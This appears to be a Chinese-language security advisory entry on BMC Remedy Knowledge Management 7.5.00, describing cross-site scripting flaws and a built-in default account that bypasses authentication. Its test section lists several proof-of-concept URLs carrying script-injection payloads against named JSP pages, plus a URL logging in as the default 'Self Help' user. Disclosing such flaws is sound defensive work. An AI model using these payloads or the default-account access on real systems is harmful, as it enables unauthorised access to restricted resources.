漏洞起因
输入验证错误
危险等级
低
影响系统
BMC Software Remedy Knowledge Management 7.5.00
不受影响系统
危害
远程攻击者可以利用漏洞获得敏感信息或绕过验证访问受限资源。
攻击所需条件
攻击者必须访问BMC Dashboards。
漏洞信息
BMC Remedy知识库管理是一个用于创建,出版,审查和搜索IT资讯知识文章的框架。
BMC Remedy知识库管理存在多个输入漏洞,允许攻击者进行跨站脚本攻击。
另外BMC Remedy知识库管理使用内置的默认账户,可被利用绕过验证。
https://target-domain.foo/rkm/index.jsp?user=Self%20Help
测试方法
https://target-domain.foo/rkm/external.jsp?doc=’%3balert(1)//&user=Self+
Help
https://target-domain.foo/rkm/search.jsp?user=Self+Help&startDate=\’%3ba
lert(1)//
https://target-domain.foo/rkm/usersettings.jsp?"><script>alert(1)</scrip
t>
https://target-domain.foo/rkm/viewdoc.jsp?doc=><script>alert(1)</script>
&user=Self%20Help
https://target-domain.foo/rkm/AttachmentServlet?="><script>alert(1)</scr
ipt>
厂商解决方案
目前没有详细解决方案提供:
http://www.bmc.com/
漏洞提供者
Richard Brain and Jan Fry of ProCheckUp Ltd.
漏洞消息链接
http://www.securityfocus.com/archive/1/517888
0 条评论。